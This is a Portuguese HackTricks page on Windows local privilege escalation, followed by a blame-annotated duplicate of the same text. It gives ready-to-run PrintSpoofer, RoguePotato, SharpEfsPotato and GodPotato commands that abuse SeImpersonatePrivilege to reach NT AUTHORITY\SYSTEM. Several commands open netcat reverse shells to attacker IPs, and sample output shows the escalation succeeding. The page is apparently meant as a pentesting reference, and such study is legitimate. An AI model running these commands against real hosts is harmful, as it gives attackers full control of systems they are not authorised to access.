hacktricks/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md

# RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato

<details>

<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Outras formas de apoiar o HackTricks:

* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>

{% hint style="warning" %}
**JuicyPotato não funciona** no Windows Server 2019 e no Windows 10 build 1809 em diante. No entanto, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato) podem ser usados para **explorar os mesmos privilégios e obter acesso ao nível `NT AUTHORITY\SYSTEM`**. Este [post do blog](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) detalha a ferramenta `PrintSpoofer`, que pode ser usada para abusar de privilégios de personificação em hosts Windows 10 e Server 2019 onde o JuicyPotato não funciona mais.
{% endhint %}

## Demonstração Rápida

### PrintSpoofer
```bash
c:\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd"

--------------------------------------------------------------------------------

[+] Found privilege: SeImpersonatePrivilege

[+] Named pipe listening...

[+] CreateProcessAsUser() OK

NULL

```
### RoguePotato

{% code overflow="wrap" %}
```bash
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l 9999
# In some old versions you need to use the "-f" param
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999
```
### SharpEfsPotato
```
SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log"
SharpEfsPotato by @bugch3ck
Local privilege escalation from SeImpersonatePrivilege using EfsRpc.

Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.

[+] Triggering name pipe access on evil PIPE \\localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/\c56e1f1f-f91c-4435-85df-6e158f68acd2\c56e1f1f-f91c-4435-85df-6e158f68acd2
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
[x]RpcBindingSetAuthInfo failed with status 0x6d3
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!

C:\temp>type C:\temp\w.log
nt authority\system
```
### GodPotato
```
GodPotato -cmd "cmd /c whoami"
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
```
<details>

<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Outras formas de apoiar o HackTricks:

* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) no github.

</details>
GITBOOK-3874: change request with no subject merged in GitBook 2023-04-13 22:25:26 +00:00			`# RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato`
GitBook: [#3541] No subject 2022-10-03 18:16:17 +00:00
			`<details>`

Translated ['windows-hardening/active-directory-methodology/README.md', 2024-01-02 21:38:50 +00:00			`<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
GitBook: [#3541] No subject 2022-10-03 18:16:17 +00:00
Translated ['windows-hardening/active-directory-methodology/README.md', 2024-01-02 21:38:50 +00:00			`Outras formas de apoiar o HackTricks:`

			`* Se você quer ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF, confira os [PLANOS DE ASSINATURA](https://github.com/sponsors/carlospolop)!`
			`* Adquira o [material oficial PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Descubra [A Família PEASS](https://opensea.io/collection/the-peass-family), nossa coleção de [NFTs](https://opensea.io/collection/the-peass-family) exclusivos`
			`* Junte-se ao grupo 💬 [Discord](https://discord.gg/hRep4RUj7f) ou ao grupo [telegram](https://t.me/peass) ou siga-me no Twitter 🐦 [@carlospolopm](https://twitter.com/carlospolopm).`
			`* Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do [HackTricks](https://github.com/carlospolop/hacktricks) e [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud).`
GitBook: [#3541] No subject 2022-10-03 18:16:17 +00:00
			`</details>`

			`{% hint style="warning" %}`
Translated ['windows-hardening/active-directory-methodology/README.md', 2024-01-02 21:38:50 +00:00			JuicyPotato não funciona no Windows Server 2019 e no Windows 10 build 1809 em diante. No entanto, [PrintSpoofer](https://github.com/itm4n/PrintSpoofer), [RoguePotato](https://github.com/antonioCoco/RoguePotato), [SharpEfsPotato](https://github.com/bugch3ck/SharpEfsPotato), [GodPotato](https://github.com/BeichenDream/GodPotato) podem ser usados para explorar os mesmos privilégios e obter acesso ao nível `NT AUTHORITY\SYSTEM`. Este [post do blog](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) detalha a ferramenta `PrintSpoofer`, que pode ser usada para abusar de privilégios de personificação em hosts Windows 10 e Server 2019 onde o JuicyPotato não funciona mais.
GitBook: [#3541] No subject 2022-10-03 18:16:17 +00:00			`{% endhint %}`

Translated ['windows-hardening/windows-local-privilege-escalation/roguep 2023-11-05 22:41:27 +00:00			`## Demonstração Rápida`
GitBook: [#3541] No subject 2022-10-03 18:16:17 +00:00
			`### PrintSpoofer`
			```bash
			`c:\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd"`

Translated ['windows-hardening/windows-local-privilege-escalation/roguep 2023-11-05 22:41:27 +00:00			`--------------------------------------------------------------------------------`
GitBook: [#3541] No subject 2022-10-03 18:16:17 +00:00
Translated ['windows-hardening/windows-local-privilege-escalation/roguep 2023-11-05 22:41:27 +00:00			`[+] Found privilege: SeImpersonatePrivilege`
GitBook: [#3541] No subject 2022-10-03 18:16:17 +00:00
Translated ['windows-hardening/windows-local-privilege-escalation/roguep 2023-11-05 22:41:27 +00:00			`[+] Named pipe listening...`
GitBook: [#3541] No subject 2022-10-03 18:16:17 +00:00
Translated ['windows-hardening/windows-local-privilege-escalation/roguep 2023-11-05 22:41:27 +00:00			`[+] CreateProcessAsUser() OK`
GitBook: [#3541] No subject 2022-10-03 18:16:17 +00:00
			`NULL`

			```
			`### RoguePotato`

Translated ['windows-hardening/windows-local-privilege-escalation/roguep 2023-11-05 22:41:27 +00:00			`{% code overflow="wrap" %}`
GitBook: [#3541] No subject 2022-10-03 18:16:17 +00:00			```bash
Translated ['windows-hardening/windows-local-privilege-escalation/roguep 2023-11-05 22:41:27 +00:00			`c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l 9999`
			`# In some old versions you need to use the "-f" param`
GitBook: [#3541] No subject 2022-10-03 18:16:17 +00:00			`c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999`
			```
GitBook: [#3612] No subject 2022-10-22 12:26:54 +00:00			`### SharpEfsPotato`
			```
			`SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami \| Set-Content C:\temp\w.log"`
			`SharpEfsPotato by @bugch3ck`
Translated ['windows-hardening/windows-local-privilege-escalation/roguep 2023-11-05 22:41:27 +00:00			`Local privilege escalation from SeImpersonatePrivilege using EfsRpc.`
GitBook: [#3612] No subject 2022-10-22 12:26:54 +00:00
Translated ['windows-hardening/windows-local-privilege-escalation/roguep 2023-11-05 22:41:27 +00:00			`Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.`
GitBook: [#3612] No subject 2022-10-22 12:26:54 +00:00
			`[+] Triggering name pipe access on evil PIPE \\localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/\c56e1f1f-f91c-4435-85df-6e158f68acd2\c56e1f1f-f91c-4435-85df-6e158f68acd2`
			`df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:`
			`[x]RpcBindingSetAuthInfo failed with status 0x6d3`
			`[+] Server connected to our evil RPC pipe`
			`[+] Duplicated impersonation token ready for process creation`
			`[+] Intercepted and authenticated successfully, launching program`
			`[+] Process created, enjoy!`

			`C:\temp>type C:\temp\w.log`
			`nt authority\system`
			```
GITBOOK-3874: change request with no subject merged in GitBook 2023-04-13 22:25:26 +00:00			`### GodPotato`
			```
			`GodPotato -cmd "cmd /c whoami"`
			`GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"`
			```
GitBook: [#3541] No subject 2022-10-03 18:16:17 +00:00			`<details>`

Translated ['windows-hardening/active-directory-methodology/README.md', 2024-01-02 21:38:50 +00:00			`<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`

			`Outras formas de apoiar o HackTricks:`
GitBook: [#3541] No subject 2022-10-03 18:16:17 +00:00
Translated ['windows-hardening/active-directory-methodology/README.md', 2024-01-02 21:38:50 +00:00			`* Se você quer ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF, confira os [PLANOS DE ASSINATURA](https://github.com/sponsors/carlospolop)!`
			`* Adquira o [material oficial PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Descubra [A Família PEASS](https://opensea.io/collection/the-peass-family), nossa coleção de [NFTs](https://opensea.io/collection/the-peass-family) exclusivos`
			`* Junte-se ao grupo 💬 [Discord](https://discord.gg/hRep4RUj7f) ou ao grupo [telegram](https://t.me/peass) ou siga-me no Twitter 🐦 [@carlospolopm](https://twitter.com/carlospolopm).`
			`* Compartilhe suas técnicas de hacking enviando PRs para os repositórios do [HackTricks](https://github.com/carlospolop/hacktricks) e [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) no github.`
GitBook: [#3541] No subject 2022-10-03 18:16:17 +00:00
			`</details>`